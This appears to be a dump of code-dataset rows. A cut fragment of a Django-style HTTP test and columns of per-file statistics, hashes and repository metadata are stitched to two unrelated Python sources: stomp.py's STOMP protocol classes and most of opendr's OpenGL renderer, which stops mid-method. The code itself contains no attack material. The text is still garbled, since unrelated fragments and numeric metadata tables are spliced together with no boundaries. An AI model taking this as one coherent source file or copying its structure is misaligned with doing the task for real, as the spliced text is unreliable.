            "text": "hi this is also testing text",
            "from": 98876568,
        }, format='json')
self.assertEqual(403, response.status_code) | 33.380597 | 96 | 0.633132 | 544 | 4,473 | 4.988971 | 0.141544 | 0.066323 | 0.06706 | 0.056374 | 0.8014 | 0.8014 | 0.8014 | 0.795505 | 0.778556 | 0.77045 | 0 | 0.026642 | 0.261569 | 4,473 | 134 | 97 | 33.380597 | 0.795035 | 0.049408 | 0 | 0.704082 | 0 | 0 | 0.157325 | 0 | 0 | 0 | 0 | 0 | 0.091837 | 1 | 0.102041 | false | 0.010204 | 0.071429 | 0 | 0.204082 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4da8679e92c4863fc33aa817711581ed05de44d5 | 8,647 | py | Python | stomp/protocol.py | artilect/stomp.py | 554c71695f961a4caf927532e5387a6814385033 | [
"Apache-2.0"
] | null | null | null | stomp/protocol.py | artilect/stomp.py | 554c71695f961a4caf927532e5387a6814385033 | [
"Apache-2.0"
] | null | null | null | stomp/protocol.py | artilect/stomp.py | 554c71695f961a4caf927532e5387a6814385033 | [
"Apache-2.0"
] | null | null | null | import uuid
import utils
from listener import *
from backward import pack, encode, hasbyte
from constants import *
class Protocol10(ConnectionListener):
def __init__(self, transport):
self.transport = transport
transport.set_listener('protocol-listener', self)
self.version = 1.0
def __send_frame(self, cmd, headers = {}, body = ''):
frame = utils.Frame(cmd, headers, body)
self.transport.send_frame(frame)
def abort(self, transaction, headers = {}, **keyword_headers):
assert transaction is not None, "'transaction' is required"
headers = utils.merge_headers([headers, keyword_headers])
headers[HDR_TRANSACTION] = transaction
self.__send_frame(CMD_ABORT, headers)
def ack(self, id, transaction = None):
assert id is not None, "'id' is required"
headers = { HDR_ID : id }
if transaction:
headers[HDR_TRANSACTION] = transaction
self.__send_frame(CMD_ACK, headers)
def begin(self, transaction = None, headers = {}, **keyword_headers):
headers = utils.merge_headers([headers, keyword_headers])
if not transaction:
transaction = str(uuid.uuid4())
headers[HDR_TRANSACTION] = transaction
self.__send_frame(CMD_BEGIN, headers)
return transaction
def commit(self, transaction = None, headers = {}, **keyword_headers):
assert transaction is not None, "'transaction' is required"
headers = utils.merge_headers([headers, keyword_headers])
headers[HDR_TRANSACTION] = transaction
        self.__send_frame(CMD_COMMIT, headers)
def connect(self, username=None, passcode=None, wait=False):
cmd = CMD_CONNECT
headers = {
HDR_ACCEPT_VERSION : self.version
}
if username is not None:
headers[HDR_LOGIN] = username
if passcode is not None:
headers[HDR_PASSCODE] = passcode
self.__send_frame(cmd, headers)
if wait:
self.transport.wait_for_connection()
    def disconnect(self, receipt=None, headers={}, **keyword_headers):
        # generate a fresh receipt per call; a default of str(uuid.uuid4())
        # is evaluated once at definition time and reused on every call
        if receipt is None:
            receipt = str(uuid.uuid4())
        headers = utils.merge_headers([headers, keyword_headers])
        if receipt:
            headers[HDR_RECEIPT] = receipt
self.__send_frame(CMD_DISCONNECT, headers)
def send(self, destination, body, content_type = None, headers = {}, **keyword_headers):
assert destination is not None, "'destination' is required"
assert body is not None, "'body' is required"
headers = utils.merge_headers([headers, keyword_headers])
headers[HDR_DESTINATION] = destination
if content_type:
headers[HDR_CONTENT_TYPE] = content_type
body = encode(body)
#if HDR_CONTENT_LENGTH not in headers:
# headers[HDR_CONTENT_LENGTH] = len(body)
self.__send_frame(CMD_SEND, headers, body)
def subscribe(self, destination, id=None, ack = 'auto', headers = {}, **keyword_headers):
assert destination is not None, "'destination' is required"
headers = utils.merge_headers([headers, keyword_headers])
headers[HDR_DESTINATION] = destination
if id:
headers[HDR_ID] = id
headers[HDR_ACK] = ack
self.__send_frame(CMD_SUBSCRIBE, headers)
def unsubscribe(self, destination = None, id = None, headers = {}, **keyword_headers):
assert id is not None or destination is not None, "'id' or 'destination' is required"
headers = utils.merge_headers([headers, keyword_headers])
if id:
headers[HDR_ID] = id
if destination:
headers[HDR_DESTINATION] = destination
self.__send_frame(CMD_UNSUBSCRIBE, headers)
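# Illustrative sketch, not part of stomp.py's API: the frames built by
# utils.Frame above are serialized on the wire as a command line, one
# "key:value" line per header, a blank line, the body, and a NUL terminator.
# _example_wire_frame is a hypothetical helper included only to show that
# layout; the real encoding lives in utils.Frame / the transport.
def _example_wire_frame(cmd, headers, body=''):
    lines = [cmd] + ['%s:%s' % (k, v) for k, v in sorted(headers.items())]
    return '\n'.join(lines) + '\n\n' + body + '\x00'
# e.g. _example_wire_frame('SEND', {'destination': '/queue/a'}, 'hi')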
class Protocol11(HeartbeatListener, ConnectionListener):
def __init__(self, transport, heartbeats = (0, 0)):
HeartbeatListener.__init__(self, heartbeats)
self.transport = transport
transport.set_listener('protocol-listener', self)
self.version = 1.1
def __send_frame(self, cmd, headers = {}, body = ''):
frame = utils.Frame(cmd, headers, body)
self.transport.send_frame(frame)
def abort(self, transaction, headers = {}, **keyword_headers):
assert transaction is not None, "'transaction' is required"
headers = utils.merge_headers([headers, keyword_headers])
headers[HDR_TRANSACTION] = transaction
self.__send_frame(CMD_ABORT, headers)
def ack(self, id, transaction = None):
assert id is not None, "'id' is required"
headers = { HDR_ID : id }
if transaction:
headers[HDR_TRANSACTION] = transaction
self.__send_frame(CMD_ACK, headers)
def begin(self, transaction = None, headers = {}, **keyword_headers):
headers = utils.merge_headers([headers, keyword_headers])
if not transaction:
transaction = str(uuid.uuid4())
headers[HDR_TRANSACTION] = transaction
self.__send_frame(CMD_BEGIN, headers)
return transaction
def commit(self, transaction = None, headers = {}, **keyword_headers):
assert transaction is not None, "'transaction' is required"
headers = utils.merge_headers([headers, keyword_headers])
headers[HDR_TRANSACTION] = transaction
        self.__send_frame(CMD_COMMIT, headers)
def connect(self, username=None, passcode=None, wait=False):
cmd = CMD_STOMP
headers = {
HDR_ACCEPT_VERSION : self.version
}
if self.transport.vhost:
headers[HDR_HOST] = self.transport.vhost
if username is not None:
headers[HDR_LOGIN] = username
if passcode is not None:
headers[HDR_PASSCODE] = passcode
self.__send_frame(cmd, headers)
if wait:
self.transport.wait_for_connection()
    def disconnect(self, receipt=None, headers={}, **keyword_headers):
        # generate a fresh receipt per call; a default of str(uuid.uuid4())
        # is evaluated once at definition time and reused on every call
        if receipt is None:
            receipt = str(uuid.uuid4())
        headers = utils.merge_headers([headers, keyword_headers])
        if receipt:
            headers[HDR_RECEIPT] = receipt
self.__send_frame(CMD_DISCONNECT, headers)
def nack(self, id, transaction = None):
assert id is not None, "'id' is required"
headers = { HDR_ID : id }
if transaction:
headers[HDR_TRANSACTION] = transaction
self.__send_frame(CMD_NACK, headers)
def send(self, destination, body, content_type = None, headers = {}, **keyword_headers):
assert destination is not None, "'destination' is required"
assert body is not None, "'body' is required"
headers = utils.merge_headers([headers, keyword_headers])
headers[HDR_DESTINATION] = destination
if content_type:
headers[HDR_CONTENT_TYPE] = content_type
body = encode(body)
if HDR_CONTENT_LENGTH not in headers and hasbyte(0, body):
headers[HDR_CONTENT_LENGTH] = len(body)
self.__send_frame(CMD_SEND, headers, body)
def subscribe(self, destination, id, ack = 'auto', headers = {}, **keyword_headers):
assert destination is not None, "'destination' is required"
assert id is not None, "'id' is required"
headers = utils.merge_headers([headers, keyword_headers])
headers[HDR_DESTINATION] = destination
headers[HDR_ID] = id
headers[HDR_ACK] = ack
self.__send_frame(CMD_SUBSCRIBE, headers)
def unsubscribe(self, id, headers = {}, **keyword_headers):
assert id is not None, "'id' is required"
headers = utils.merge_headers([headers, keyword_headers])
headers[HDR_ID] = id
self.__send_frame(CMD_UNSUBSCRIBE, headers)
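# Usage sketch (illustrative; assumes a connected transport and that the
# HDR_* constants map to the standard STOMP header names):
#
#     proto = Protocol11(transport)
#     proto.connect(username='guest', passcode='guest', wait=True)
#     txid = proto.begin()              # generates and returns a uuid id
#     proto.send('/queue/test', 'hello', transaction=txid)
#     proto.commit(transaction=txid)
#
# begin() returns the transaction id so the same id can be threaded through
# send()/commit()/abort(); extra keyword arguments become frame headers via
# utils.merge_headers.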
class Protocol12(Protocol11):
def __init__(self, transport, heartbeats = (0, 0)):
Protocol11.__init__(self, transport, heartbeats)
self.version = 1.2
def __send_frame(self, cmd, headers = {}, body = ''):
frame = utils.Frame(cmd, headers, body)
self.transport.send_frame(frame)
def connect(self, username=None, passcode=None, wait=False):
cmd = CMD_STOMP
headers = {
HDR_ACCEPT_VERSION : self.version,
HDR_HOST : self.transport.current_host_and_port[0]
}
if self.transport.vhost:
headers[HDR_HOST] = self.transport.vhost
if username is not None:
headers[HDR_LOGIN] = username
if passcode is not None:
headers[HDR_PASSCODE] = passcode
self.__send_frame(cmd, headers)
if wait:
self.transport.wait_for_connection()
| 37.925439 | 93 | 0.639759 | 977 | 8,647 | 5.436029 | 0.079836 | 0.075315 | 0.110714 | 0.054227 | 0.923367 | 0.911693 | 0.908304 | 0.875165 | 0.863679 | 0.863679 | 0 | 0.004075 | 0.262056 | 8,647 | 227 | 94 | 38.092511 | 0.82824 | 0.009252 | 0 | 0.834254 | 0 | 0 | 0.047052 | 0 | 0 | 0 | 0 | 0 | 0.088398 | 1 | 0.143646 | false | 0.049724 | 0.027624 | 0 | 0.198895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
12ac5479a12b1754a06bee2fe3f5617f6cd56c47 | 569,932 | py | Python | opendr/renderer.py | yukihiko/hrm | 89bfb075d3c9ba91826c0c782ca6aff9507c663b | [
"MIT"
] | null | null | null | opendr/renderer.py | yukihiko/hrm | 89bfb075d3c9ba91826c0c782ca6aff9507c663b | [
"MIT"
] | null | null | null | opendr/renderer.py | yukihiko/hrm | 89bfb075d3c9ba91826c0c782ca6aff9507c663b | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
"""
Author(s): Matthew Loper
See LICENCE.txt for licensing and contact information.
"""
__all__ = ['ColoredRenderer', 'TexturedRenderer']
import numpy as np
import pdb
import cv2
import time
import platform
import scipy.sparse as sp
from copy import deepcopy
from opendr import common
from opendr.topology import get_vertices_per_edge, get_faces_per_edge
# if platform.system()=='Darwin':
# from opendr.contexts.ctx_mac import OsContext
# else:
# from opendr.contexts.ctx_mesa import OsContext
import OpenGL.GL as GL
import OpenGL.GL.shaders as shaders
from OpenGL.arrays import vbo
from PIL import Image
# import pdb
import matplotlib.pyplot as plt
from chumpy import *
# from opendr.contexts._constants import *
from chumpy.utils import row, col
import time
pixel_center_offset = 0.5
class BaseRenderer(Ch):
terms = ['f', 'frustum','overdraw', 'win', 'f_list', 'v_list', 'vn_list', 'vc_list']
dterms = ['camera', 'v']
def makeCurrentContext(self):
if self.glMode == 'glfw':
import glfw
glfw.make_context_current(self.win)
else:
from OpenGL import arrays
from OpenGL.raw.osmesa import mesa
mesa.OSMesaMakeCurrent(self.ctx, GL.GLuint(self.mesap), GL.GL_UNSIGNED_BYTE, self.frustum['width'], self.frustum['height'])
def clear(self):
try:
self.win
except:
# print ("Clearing when not initialized.")
return
if self.win:
try:
# print ("Clearing base renderer.")
GL.glDeleteProgram(self.colorProgram)
self.makeCurrentContext()
self.vbo_indices.set_array(np.array([]))
self.vbo_indices.bind()
self.vbo_indices.unbind()
self.vbo_indices.delete()
self.vbo_indices_range.set_array(np.array([]))
self.vbo_indices_range.bind()
self.vbo_indices_range.unbind()
self.vbo_indices_range.delete()
self.vbo_indices_dyn.set_array(np.array([]))
self.vbo_indices_dyn.bind()
self.vbo_indices_dyn.unbind()
self.vbo_indices_dyn.delete()
self.vbo_verts.set_array(np.array([]))
self.vbo_verts.bind()
self.vbo_verts.unbind()
self.vbo_verts.delete()
self.vbo_verts_face.set_array(np.array([]))
self.vbo_verts_face.bind()
self.vbo_verts_face.unbind()
self.vbo_verts_face.delete()
self.vbo_verts_dyn.set_array(np.array([]))
self.vbo_verts_dyn.bind()
self.vbo_verts_dyn.unbind()
self.vbo_verts_dyn.delete()
self.vbo_colors_ub.set_array(np.array([]))
self.vbo_colors_ub.bind()
self.vbo_colors_ub.unbind()
self.vbo_colors_ub.delete()
self.vbo_colors.set_array(np.array([]))
self.vbo_colors.bind()
self.vbo_colors.unbind()
self.vbo_colors.delete()
self.vbo_colors_face.set_array(np.array([]))
self.vbo_colors_face.bind()
self.vbo_colors_face.unbind()
self.vbo_colors_face.delete()
GL.glDeleteVertexArrays(1, [self.vao_static.value])
GL.glDeleteVertexArrays(1, [self.vao_static_face.value])
GL.glDeleteVertexArrays(1, [self.vao_dyn.value])
GL.glDeleteVertexArrays(1, [self.vao_dyn_ub.value])
GL.glDeleteRenderbuffers(1, [int(self.render_buf)])
GL.glDeleteRenderbuffers(1, [int(self.z_buf)])
if self.msaa:
GL.glDeleteRenderbuffers(1, [int(self.render_buf_ms)])
GL.glDeleteRenderbuffers(1, [int(self.z_buf_ms)])
GL.glDeleteFramebuffers(1, [int(self.fbo)])
GL.glDeleteFramebuffers(1, [int(self.fbo_noms)])
if self.msaa:
GL.glDeleteFramebuffers(1, [int(self.fbo_ms)])
# print("Finished clearning base renderer")
except:
pdb.set_trace()
def initGL(self):
try:
self.frustum
self.f
self.v
self.vc
self.glMode
except:
print ("Necessary variables have not been set (frustum, f, v, or vc).")
return
if self.glMode == 'glfw':
import glfw
glfw.init()
print("Initializing GLFW.")
glfw.window_hint(glfw.CONTEXT_VERSION_MAJOR, 3)
glfw.window_hint(glfw.CONTEXT_VERSION_MINOR, 3)
# glfw.window_hint(glfw.OPENGL_FORWARD_COMPAT, GL.GL_TRUE)
glfw.window_hint(glfw.OPENGL_PROFILE, glfw.OPENGL_CORE_PROFILE)
glfw.window_hint(glfw.DEPTH_BITS,32)
glfw.window_hint(glfw.VISIBLE, GL.GL_FALSE)
self.win = glfw.create_window(self.frustum['width'], self.frustum['height'], "test", None, self.sharedWin)
glfw.make_context_current(self.win)
else: #Mesa
from OpenGL import arrays
from OpenGL.raw.osmesa import mesa
try:
self.sharedWin
except:
self.sharedWin = None
self.ctx = mesa.OSMesaCreateContext(GL.GL_RGBA, self.sharedWin)
self.win = self.ctx
self.buf = arrays.GLubyteArray.zeros((self.frustum['height'], self.frustum['width'], 3))
self.mesap = arrays.ArrayDatatype.dataPointer(self.buf)
assert(mesa.OSMesaMakeCurrent(self.ctx, GL.GLuint(self.mesap), GL.GL_UNSIGNED_BYTE, self.frustum['width'], self.frustum['height']))
GL.USE_ACCELERATE = True
GL.glViewport(0, 0, self.frustum['width'], self.frustum['height'])
#FBO_f
self.fbo = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
self.render_buf = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER,self.render_buf)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_DRAW_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, self.render_buf)
self.z_buf = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf)
self.line_width = 1.
#FBO_f
# if self.msaa and self.glMode == 'glfw':
if self.msaa:
try:
self.nsamples
except:
self.nsamples = 8
try:
self.overdraw
except:
self.overdraw = True
self.fbo_ms = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_ms )
self.render_buf_ms = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER,self.render_buf_ms)
GL.glRenderbufferStorageMultisample(GL.GL_RENDERBUFFER, self.nsamples, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_DRAW_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, self.render_buf_ms)
self.z_buf_ms = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_ms)
GL.glRenderbufferStorageMultisample(GL.GL_RENDERBUFFER, self.nsamples, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_ms)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print ("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER,0)
self.fbo_noms = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_noms )
self.render_buf_noms = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER,self.render_buf_noms)
GL.glRenderbufferStorageMultisample(GL.GL_RENDERBUFFER,0, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_DRAW_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, self.render_buf_noms)
self.z_buf_noms = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_noms)
GL.glRenderbufferStorageMultisample(GL.GL_RENDERBUFFER,0 , GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_noms)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print ("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER,0)
# GL.glClear(GL.GL_COLOR_BUFFER_BIT)
# GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
############################
# ENABLE SHADER
FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
// Interpolated values from the vertex shaders
in vec3 theColor;
        // Output data
out vec3 color;
void main(){
color = theColor;
}""", GL.GL_FRAGMENT_SHADER)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 color;
uniform mat4 MVP;
out vec3 theColor;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
theColor = color;
}""", GL.GL_VERTEX_SHADER)
self.colorProgram = shaders.compileProgram(VERTEX_SHADER,FRAGMENT_SHADER)
shaders.glUseProgram(self.colorProgram)
FRAGMENT_SHADER_NOPERSP = shaders.compileShader("""#version 330 core
// Interpolated values from the vertex shaders
in vec3 theColor;
//noperspective in vec3 theColor;
        // Output data
out vec3 color;
void main(){
        color = theColor;
}""", GL.GL_FRAGMENT_SHADER)
VERTEX_SHADER_NOPERSP = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 color;
uniform mat4 MVP;
out vec3 theColor;
//noperspective out vec3 theColor;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
theColor = color;
}""", GL.GL_VERTEX_SHADER)
self.colorProgram_noperspective = shaders.compileProgram(VERTEX_SHADER_NOPERSP,FRAGMENT_SHADER_NOPERSP)
# self.colorProgram = shaders.compileProgram(VERTEX_SHADER,FRAGMENT_SHADER)
position_location = GL.glGetAttribLocation(self.colorProgram, 'position')
color_location = GL.glGetAttribLocation(self.colorProgram, 'color')
# color_location_ub = GL.glGetAttribLocation(self.colorProgram, 'color')
self.MVP_location = GL.glGetUniformLocation(self.colorProgram, 'MVP')
#
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
indices = np.array(self.f, dtype=np.uint32)
self.vbo_indices = vbo.VBO(indices, target=GL.GL_ELEMENT_ARRAY_BUFFER)
self.vbo_indices_range = vbo.VBO(np.arange(self.f.size, dtype=np.uint32).ravel(), target=GL.GL_ELEMENT_ARRAY_BUFFER)
self.vbo_indices_dyn = vbo.VBO(indices, target=GL.GL_ELEMENT_ARRAY_BUFFER)
self.vbo_verts = vbo.VBO(np.array(self.v, dtype=np.float32))
# glGenBuffers(1, &vboID);
# glBindBuffer(GL_VERTEX_ARRAY, vboID);
# glBufferData(GL_VERTEX_ARRAY, 3 * sizeof(Vertex), &vertices[0], GL_STATIC_DRAW);
# glBindBuffer(GL_VERTEX_ARRAY, NULL);
self.vbo_verts_face = vbo.VBO(self.verts_by_face.astype(np.float32))
self.vbo_verts_dyn = vbo.VBO(np.array(self.v, dtype=np.float32))
self.vbo_colors = vbo.VBO(np.array(self.vc, dtype=np.float32))
self.vbo_colors_face = vbo.VBO(np.array(self.vc_by_face, dtype=np.float32))
self.vao_static = GL.GLuint(0)
GL.glGenVertexArrays(1, self.vao_static)
GL.glBindVertexArray(self.vao_static)
self.vbo_indices.bind()
self.vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
self.vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
GL.glBindVertexArray(0)
self.vao_static_face = GL.GLuint(0)
GL.glGenVertexArrays(1, self.vao_static_face)
GL.glBindVertexArray(self.vao_static_face)
#Can arrays be empty?
self.vbo_indices_range.bind()
self.vbo_verts_face.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
self.vbo_colors_face.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
GL.glBindVertexArray(0)
self.vao_dyn = GL.GLuint(0)
GL.glGenVertexArrays(1, self.vao_dyn)
GL.glBindVertexArray(self.vao_dyn)
#Can arrays be empty?
self.vbo_indices_dyn.bind()
self.vbo_verts_dyn.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
self.vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
GL.glBindVertexArray(0)
self.vao_dyn_ub = GL.GLuint(0)
GL.glGenVertexArrays(1, self.vao_dyn_ub)
GL.glBindVertexArray(self.vao_dyn_ub)
self.vbo_indices_dyn.bind()
self.vbo_verts_dyn.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
self.vbo_colors_ub = vbo.VBO(np.array(np.array(self.vc, dtype=np.uint8)))
self.vbo_colors_ub.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_UNSIGNED_BYTE, GL.GL_TRUE, 0, None)
self.initialized = True
print('glValidateProgram: ' + str(GL.glValidateProgram(self.colorProgram)))
print('glGetProgramInfoLog ' + str(GL.glGetProgramInfoLog(self.colorProgram)))
print('GL_MAX_VERTEX_ATTRIBS: ' + str(GL.glGetInteger(GL.GL_MAX_VERTEX_ATTRIBS)))
print (GL.glGetError())
@depends_on('f') # not v: specifically, it depends only on the number of vertices, not on the values in v
def primitives_per_edge(self):
v=self.v.r.reshape((-1,3))
f=self.f
vpe = get_vertices_per_edge(v, f)
fpe = get_faces_per_edge(v, f, vpe)
return fpe, vpe
@depends_on('f', 'frustum', 'camera', 'overdraw')
def barycentric_image(self):
self._call_on_changed()
return self.draw_barycentric_image(self.boundarybool_image if self.overdraw else None)
@depends_on(terms+dterms)
def boundaryid_image(self):
self._call_on_changed()
return self.draw_boundaryid_image( self.v.r, self.f, self.vpe, self.fpe, self.camera)
@depends_on('f', 'frustum', 'camera', 'overdraw')
def visibility_image(self):
self._call_on_changed()
return self.draw_visibility_image(self.v.r, self.f, self.boundarybool_image if self.overdraw else None)
@depends_on(terms+dterms)
def boundarybool_image(self):
self._call_on_changed()
boundaryid_image = self.boundaryid_image
return np.asarray(boundaryid_image != 4294967295, np.uint32).reshape(boundaryid_image.shape)
@depends_on(terms+dterms)
def boundarybool_image_aa(self):
self._call_on_changed()
boundaryid_image = self.boundaryid_image_aa
return np.asarray(boundaryid_image != 4294967295, np.uint32).reshape(boundaryid_image.shape)
@property
def shape(self):
raise NotImplementedError('Should be implemented in inherited class.')
# @v.setter
# def v(self, newval):
# self.camera.v = newval
@property
def vpe(self):
return self.primitives_per_edge[1]
@depends_on('f', 'v')
def verts_by_face(self):
verts_by_face = self.v.reshape((-1,3))[self.f.ravel()]
return np.asarray(verts_by_face, dtype=np.float64, order='C')
@depends_on('f', 'v')
def vc_by_face(self):
return np.asarray(np.tile(np.eye(3)[:self.f.shape[1], :], (self.verts_by_face.shape[0]//self.f.shape[1], 1)), dtype=np.float64, order='C')
@depends_on('f', 'v', 'vn')
def tn(self):
from opendr.geometry import TriNormals
# return TriNormals(self.v, self.f).r.reshape((-1,3))
tn = np.mean(self.vn.r[self.f.ravel()].reshape([-1, 3, 3]), 1)
return tn
@property
def fpe(self):
return self.primitives_per_edge[0]
@depends_on(terms+dterms)
def boundary_neighborhood(self):
return common.boundary_neighborhood(self.boundarybool_image)
def _setup_camera(self, cx, cy, fx, fy, w, h, near, far, view_matrix, k):
k = np.asarray(k)
#Make Projection matrix.
self.projectionMatrix = np.array([[fx/cx, 0,0,0], [0, fy/cy, 0,0], [0,0, -(near + far)/(far - near), -2*near*far/(far-near)], [0,0, -1, 0]], dtype=np.float32)
# self.projectionMatrix = np.array([[fx/w, 0,0,0], [0, fy/cy, 0,0], [0,0, -(near + far)/(far - near), -2*near*far/(far-near)], [0,0,-1,1]], dtype=np.float64)
def draw_colored_verts(self, vc):
GL.glUseProgram(self.colorProgram)
GL.glDisable(GL.GL_CULL_FACE)
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
if vc.shape[1] != 3:
            # pad/cycle the channels so vc always has exactly 3 color columns
vc = np.vstack((vc[:,0], vc[:,1%vc.shape[1]], vc[:,2%vc.shape[1]])).T.copy()
assert(vc.shape[1]==3)
GL.glBindVertexArray(self.vao_static)
self.vbo_colors.set_array(vc.astype(np.float32))
self.vbo_colors.bind()
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))), np.float32))
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, np.dot(self.projectionMatrix, view_mtx))
GL.glDrawElements(GL.GL_TRIANGLES, len(self.vbo_indices)*3, GL.GL_UNSIGNED_INT, None)
GL.glDisable(GL.GL_CULL_FACE)
def draw_noncolored_verts(self, v, f):
if self.msaa:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_noms)
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
shaders.glUseProgram(self.colorProgram)
GL.glBindVertexArray(self.vao_static)
self.vbo_colors.set_array(np.zeros_like(v.reshape((-1,3))[f.ravel()], dtype=np.float32, order='C'))
        self.vbo_colors.bind()
GL.glDrawElements(GL.GL_TRIANGLES, len(self.vbo_indices)*3, GL.GL_UNSIGNED_INT, None)
def draw_edge_visibility(self, v, e, f, hidden_wireframe=True):
"""Assumes camera is set up correctly in gl context."""
shaders.glUseProgram(self.colorProgram)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glDepthMask(GL.GL_TRUE)
